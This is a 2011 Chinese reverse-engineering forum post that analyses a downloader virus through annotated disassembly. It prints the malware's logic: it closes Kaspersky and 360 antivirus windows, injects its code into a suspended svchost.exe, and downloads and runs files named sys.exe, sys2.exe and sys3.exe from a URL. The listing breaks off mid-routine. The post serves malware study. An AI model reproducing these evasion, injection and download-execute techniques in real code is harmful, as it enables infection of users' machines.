标 题: 【原创】僵尸替换执行
作 者: 苏
时 间: 2011.3.25.16.47
链 接: http://bbs.pediy.com/showthread.php?t=131351
【文章标题】: 僵尸替换执行
【文章作者】: 苏
【软件名称】: 5.V
【软件大小】: 11.9KB
【下载地址】: 见以下附件
【保护方式】: UPX
【编写语言】: Borland Delphi 6.0 - 7.0
【使用工具】: PEID,OD,IDA
【操作平台】: D-Windows XP3
【连接地址】: http://bbs.pediy.com/showthread.php?t=131351
【程序介绍】: 一个病毒程序
【作者声明】: 在逆向中学习
此病毒主要是一个下载者
本来还有个upx的壳
不过壳已经被扒下了。而忘了吧原本给丢了。。
结果导致现在硬盘里只有扒过壳的程序。。。。
所有无法从脱壳那开始写。。。
刚点开程序时
扫了下字符串
发现如下的可疑字符串
131458B8 >/$ 55 push ebp
131458B9 |. 8BEC mov ebp, esp
131458BB |. 83C4 E4 add esp, -1C
131458BE |. 53 push ebx
131458BF |. 56 push esi
131458C0 |. 33C0 xor eax, eax
131458C2 |. 8945 E8 mov dword ptr [ebp-18], eax
131458C5 |. 8945 E4 mov dword ptr [ebp-1C], eax
131458C8 |. 8945 EC mov dword ptr [ebp-14], eax
131458CB |. B8 60581413 mov eax, 13145860
131458D0 |. E8 BFE4FFFF call 13143D94
131458D5 |. 33C0 xor eax, eax
131458D7 |. 55 push ebp
131458D8 |. 68 3E5A1413 push 13145A3E
131458DD |. 64:FF30 push dword ptr fs:[eax]
131458E0 |. 64:8920 mov dword ptr fs:[eax], esp
131458E3 |. 68 4C5A1413 push 13145A4C ; ASCII "dxdown"
131458E8 |. 6A FF push -1
131458EA |. 6A 00 push 0
131458EC |. E8 67E5FFFF call 13143E58 ; 通过创建互斥量,来保证内存中只有一个实例
131458F1 |. E8 D2E5FFFF call <jmp.&KERNEL32.GetLastError> ; [GetLastError
131458F6 |. 3D B7000000 cmp eax, 0B7
131458FB |. 75 05 jnz short 13145902
131458FD |. E8 FADBFFFF call 131434FC ; 已存在实例,退出
13145902 |> B0 01 mov al, 1
13145904 |. E8 DBEBFFFF call 131444E4 ; 创建一个工作线程
13145909 |. B8 AC761413 mov eax, 131476AC
1314590E |. BA 44000000 mov edx, 44
13145913 |. E8 60E6FFFF call 13143F78
131444B8 . 6A 01 push 1 ; 线程1
131444BA . 6A 00 push 0
131444BC . 68 DC431413 push 131443DC ; 线程2
131444C1 . 6A 00 push 0
131444C3 . 6A 01 push 1
131444C5 . E8 2EFBFFFF call <jmp.&winmm.timeSetEvent> ; 启动线程2
131444CA . A3 78761413 mov dword ptr [13147678], eax
131444CF > 6A 00 push 0 ; /MsgFilterMax = 0
131444D1 . 6A 00 push 0 ; |MsgFilterMin = 0
131444D3 . 6A 00 push 0 ; |hWnd = NULL
131444D5 . 68 7C761413 push 1314767C ; |pMsg = 5.1314767C
131444DA . E8 71FAFFFF call <jmp.&user32.GetMessageA> ; \GetMessageA
131444DF . 85C0 test eax, eax
131444E1 .^ 75 EC jnz short 131444CF
131444E3 . C3 retn
131443DC /. 55 push ebp ; 线程2、
131443DD |. 8BEC mov ebp, esp
131443DF |. 53 push ebx
131443E0 |. 6A 00 push 0 ; /Title = NULL
131443E2 |. 68 6C441413 push 1314446C ; |Class = "AVP.Void"
131443E7 |. E8 54FBFFFF call <jmp.&user32.FindWindowA> ; \FindWindowA
131443EC |. 85DB test ebx, ebx
131443EE |. 74 12 je short 13144402
131443F0 |. 6A 00 push 0 ; /lParam = 0
131443F2 |. 68 60F00000 push 0F060 ; |wParam = F060
131443F7 |. 68 12010000 push 112 ; |Message = WM_SYSCOMMAND
131443FC |. 53 push ebx ; |hWnd
131443FD |. E8 66FBFFFF call <jmp.&user32.SendMessageA> ; \SendMessageA
13144402 |> 6A 00 push 0 ; /Title = NULL
13144404 |. 68 78441413 push 13144478 ; |Class = "AVP.Product_Notification"
13144409 |. E8 32FBFFFF call <jmp.&user32.FindWindowA> ; \FindWindowA
1314440E |. 8BD8 mov ebx, eax
13144410 |. 85DB test ebx, ebx
13144412 |. 74 12 je short 13144426
13144414 |. 6A 00 push 0 ; /lParam = 0
13144416 |. 68 60F00000 push 0F060 ; |wParam = F060
1314441B |. 68 12010000 push 112 ; |Message = WM_SYSCOMMAND
13144420 |. 53 push ebx ; |hWnd
13144421 |. E8 42FBFFFF call <jmp.&user32.SendMessageA> ; \SendMessageA
13144426 |> 6A 00 push 0 ; /Title = NULL
13144428 |. 68 94441413 push 13144494 ; |Class = "Q360SafeMonClass"
1314442D |. E8 0EFBFFFF call <jmp.&user32.FindWindowA> ; \FindWindowA
13144432 |. 85C0 test eax, eax
13144434 |. 74 12 je short 13144448
13144436 |. 6A 00 push 0 ; /lParam = 0
13144438 |. 68 60F00000 push 0F060 ; |wParam = F060
1314443D |. 68 12010000 push 112 ; |Message = WM_SYSCOMMAND
13144442 |. 50 push eax ; |hWnd
13144443 |. E8 20FBFFFF call <jmp.&user32.SendMessageA> ; \SendMessageA
13144448 |> 6A 00 push 0 ; /Title = NULL
1314444A |. 68 A8441413 push 131444A8 ; |Class = "AVP.AlertDialog"
1314444F |. E8 ECFAFFFF call <jmp.&user32.FindWindowA> ; \FindWindowA
13144454 |. 85C0 test eax, eax
13144456 |. 74 0D je short 13144465
13144458 |. 6A 00 push 0 ; /lParam = 0
1314445A |. 68 98411413 push 13144198 ; |Callback = 5.13144198
1314445F |. 50 push eax ; |hParent
13144460 |. E8 D3FAFFFF call <jmp.&user32.EnumChildWindows> ; \EnumChildWindows
13144465 |> 5B pop ebx
13144466 |. 5D pop ebp
13144467 \. C2 1400 retn 14
1314446A 00 db 0
13145951 |. 50 push eax ; |CommandLine
13145952 |. 6A 00 push 0 ; |ModuleFileName = NULL
13145954 |. E8 1FE5FFFF call <jmp.&KERNEL32.CreateProcessA> ; \CreateProcessA
13145959 |. 85C0 test eax, eax ; 创建一个 svchost.exe进程,并且设置为 CREATE_SUSPENDED
1314595B |. 0F84 C2000000 je 13145A23
13145961 |. 6A 00 push 0 ; /pModule = NULL
13145963 |. E8 68E5FFFF call <jmp.&KERNEL32.GetModuleHandleA> ; \GetModuleHandleA
13145968 |. 8BD8 mov ebx, eax
1314596A |. 8B43 3C mov eax, dword ptr [ebx+3C]
1314596D |. 03C3 add eax, ebx
1314596F |. 83C0 04 add eax, 4
13145972 |. 83C0 14 add eax, 14
13145975 |. 8B70 38 mov esi, dword ptr [eax+38] ; 下面的将自己的代码注入到 svchost.exe 里,然后恢复线程
13145978 |. 6A 40 push 40 ; /flProtect = 40 (64.)
1314597A |. 68 00300000 push 3000 ; |flAllocationType = 3000 (12288.)
1314597F |. 56 push esi ; |dwSize
13145980 |. 53 push ebx ; |lpAddress
13145981 |. A1 F0761413 mov eax, dword ptr [131476F0] ; |
13145986 |. 50 push eax ; |hProcess => 0000005C (window)
13145987 |. E8 8CE5FFFF call <jmp.&KERNEL32.VirtualAllocEx> ; \VirtualAllocEx
1314598C |. 68 00771413 push 13147700 ; /pBytesWritten = 5.13147700
13145991 |. 56 push esi ; |BytesToWrite
13145992 |. 53 push ebx ; |Buffer
13145993 |. 50 push eax ; |Address
13145994 |. A1 F0761413 mov eax, dword ptr [131476F0] ; |
13145999 |. 50 push eax ; |hProcess => 0000005C (window)
1314599A |. E8 89E5FFFF call <jmp.&KERNEL32.WriteProcessMemor>; \WriteProcessMemory
1314599F |. C705 04771413>mov dword ptr [13147704], 10007
131459A9 |. 68 04771413 push 13147704 ; /pContext = 5.13147704
131459AE |. A1 F4761413 mov eax, dword ptr [131476F4] ; |
131459B3 |. 50 push eax ; |hThread => 0000007C (window)
131459B4 |. E8 2FE5FFFF call <jmp.&KERNEL32.GetThreadContext> ; \GetThreadContext
131459B9 |. B8 884E1413 mov eax, 13144E88
131459BE |. A3 BC771413 mov dword ptr [131477BC], eax
131459C3 |. 68 04771413 push 13147704 ; /pContext = 5.13147704
131459C8 |. A1 F4761413 mov eax, dword ptr [131476F4] ; |
131459CD |. 50 push eax ; |hThread => 0000007C (window)
131459CE |. E8 3DE5FFFF call <jmp.&KERNEL32.SetThreadContext> ; \SetThreadContext
131459D3 |. A1 F4761413 mov eax, dword ptr [131476F4]
131459D8 |. 50 push eax ; /hThread => 0000007C (window)
131459D9 |. E8 22E5FFFF call <jmp.&KERNEL32.ResumeThread> ; \ResumeThread
13144E88 . 55 push ebp ; 注入部分
13144E89 . 8BEC mov ebp, esp
13144E8B . 53 push ebx
13144E8C . 56 push esi
13144E8D . 57 push edi
13144E8E . 68 60541413 push 13145460 ; /FileName = "kernel32.dll"
13144E93 . E8 60F0FFFF call <jmp.&KERNEL32.LoadLibraryA> ; \LoadLibraryA
13144E98 . 68 70541413 push 13145470 ; /FileName = "user32.dll"
13144E9D . E8 56F0FFFF call <jmp.&KERNEL32.LoadLibraryA> ; \LoadLibraryA
13144EA2 . 68 7C541413 push 1314547C ; /FileName = "Shell32.dll"
13144EA7 . E8 4CF0FFFF call <jmp.&KERNEL32.LoadLibraryA> ; \LoadLibraryA
13144EAC . A3 A4761413 mov dword ptr [131476A4], eax
13144EB1 . 68 88541413 push 13145488 ; /FileName = "urlmon.dll"
13144EB6 . E8 3DF0FFFF call <jmp.&KERNEL32.LoadLibraryA> ; \LoadLibraryA
13144EBB . A3 A8761413 mov dword ptr [131476A8], eax
13144EC0 . 68 94541413 push 13145494 ; /ProcNameOrOrdinal = "ShellExecuteA"
13144EC5 . A1 A4761413 mov eax, dword ptr [131476A4] ; |
13144ECA . 50 push eax ; |hModule => NULL
13144ECB . E8 08F0FFFF call <jmp.&KERNEL32.GetProcAddress> ; \GetProcAddress
13144ED0 . A3 9C761413 mov dword ptr [1314769C], eax
13144ED5 . 68 A4541413 push 131454A4 ; /ProcNameOrOrdinal = "URLDownloadToFileA"
13144EDA . A1 A8761413 mov eax, dword ptr [131476A8] ; |
13144EDF . 50 push eax ; |hModule => NULL
13144EE0 . E8 F3EFFFFF call <jmp.&KERNEL32.GetProcAddress> ; \GetProcAddress
13144EE5 . A3 A0761413 mov dword ptr [131476A0], eax
13144EEA . 33C0 xor eax, eax
13144EEC . 55 push ebp
13144EED . 68 194F1413 push 13144F19
13144EF2 . 64:FF30 push dword ptr fs:[eax]
13144EF5 . 64:8920 mov dword ptr fs:[eax], esp
13144EF8 . 6A 00 push 0
13144EFA . 6A 00 push 0
13144EFC . 68 B8541413 push 131454B8 ; ASCII "C:\Program Files\WindowsUpdate\sys.exe"
13144F01 . A1 A4601413 mov eax, dword ptr [131460A4]
13144F06 . 50 push eax
13144F07 . 6A 00 push 0
13144F09 . FF15 A0761413 call dword ptr [131476A0]
13144F0F . 33C0 xor eax, eax
13144F11 . 5A pop edx
13144F12 . 59 pop ecx
13144F13 . 59 pop ecx
13144F14 . 64:8910 mov dword ptr fs:[eax], edx
13144F17 . EB 0A jmp short 13144F23
13144F19 .^ E9 3EE0FFFF jmp 13142F5C
13144F1E . E8 F1E1FFFF call 13143114
13144F23 > B8 E8541413 mov eax, 131454E8 ; ASCII "C:\Program Files\WindowsUpdate\sys.exe"
13144F28 . E8 3BF1FFFF call 13144068
13144F2D . 84C0 test al, al
13144F2F . 74 44 je short 13144F75
13144F31 . 33C0 xor eax, eax
13144F33 . 55 push ebp
13144F34 . 68 6B4F1413 push 13144F6B
13144F39 . 64:FF30 push dword ptr fs:[eax]
13144F3C . 64:8920 mov dword ptr fs:[eax], esp
13144F3F . 6A 05 push 5
13144F41 . 6A 00 push 0
13144F43 . 6A 00 push 0
13144F45 . 68 B8541413 push 131454B8 ; ASCII "C:\Program Files\WindowsUpdate\sys.exe"
13144F4A . 68 10551413 push 13145510 ; ASCII "open"
13144F4F . 6A 00 push 0
13144F51 . FF15 9C761413 call dword ptr [1314769C]
13144F57 . B8 D0070000 mov eax, 7D0
13144F5C . E8 EFF1FFFF call 13144150
13144F61 . 33C0 xor eax, eax
13144F63 . 5A pop edx
13144F64 . 59 pop ecx
13144F65 . 59 pop ecx
13144F66 . 64:8910 mov dword ptr fs:[eax], edx
13144F69 . EB 0A jmp short 13144F75
13144F6B .^ E9 ECDFFFFF jmp 13142F5C
13144F70 . E8 9FE1FFFF call 13143114
13144F75 > 33C0 xor eax, eax
13144F77 . 55 push ebp
13144F78 . 68 A44F1413 push 13144FA4
13144F7D . 64:FF30 push dword ptr fs:[eax]
13144F80 . 64:8920 mov dword ptr fs:[eax], esp
13144F83 . 6A 00 push 0
13144F85 . 6A 00 push 0
13144F87 . 68 18551413 push 13145518 ; ASCII "C:\Program Files\WindowsUpdate\sys2.exe"
13144F8C . A1 A8601413 mov eax, dword ptr [131460A8]
13144F91 . 50 push eax
13144F92 . 6A 00 push 0
13144F94 . FF15 A0761413 call dword ptr [131476A0]
13144F9A . 33C0 xor eax, eax
13144F9C . 5A pop edx
13144F9D . 59 pop ecx
13144F9E . 59 pop ecx
13144F9F . 64:8910 mov dword ptr fs:[eax], edx
13144FA2 . EB 0A jmp short 13144FAE
13144FA4 .^ E9 B3DFFFFF jmp 13142F5C
13144FA9 . E8 66E1FFFF call 13143114
13144FAE > B8 48551413 mov eax, 13145548 ; ASCII "C:\Program Files\WindowsUpdate\sys2.exe"
13144FB3 . E8 B0F0FFFF call 13144068
13144FB8 . 84C0 test al, al
13144FBA . 74 44 je short 13145000
13144FBC . 33C0 xor eax, eax
13144FBE . 55 push ebp
13144FBF . 68 F64F1413 push 13144FF6
13144FC4 . 64:FF30 push dword ptr fs:[eax]
13144FC7 . 64:8920 mov dword ptr fs:[eax], esp
13144FCA . 6A 05 push 5
13144FCC . 6A 00 push 0
13144FCE . 6A 00 push 0
13144FD0 . 68 18551413 push 13145518 ; ASCII "C:\Program Files\WindowsUpdate\sys2.exe"
13144FD5 . 68 10551413 push 13145510 ; ASCII "open"
13144FDA . 6A 00 push 0
13144FDC . FF15 9C761413 call dword ptr [1314769C]
13144FE2 . B8 D0070000 mov eax, 7D0
13144FE7 . E8 64F1FFFF call 13144150
13144FEC . 33C0 xor eax, eax
13144FEE . 5A pop edx
13144FEF . 59 pop ecx
13144FF0 . 59 pop ecx
13144FF1 . 64:8910 mov dword ptr fs:[eax], edx
13144FF4 . EB 0A jmp short 13145000
13144FF6 .^ E9 61DFFFFF jmp 13142F5C
13144FFB . E8 14E1FFFF call 13143114
13145000 > 33C0 xor eax, eax
13145002 . 55 push ebp
13145003 . 68 2F501413 push 1314502F
13145008 . 64:FF30 push dword ptr fs:[eax]
1314500B . 64:8920 mov dword ptr fs:[eax], esp
1314500E . 6A 00 push 0
13145010 . 6A 00 push 0
13145012 . 68 70551413 push 13145570 ; ASCII "C:\Program Files\WindowsUpdate\sys3.exe"
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!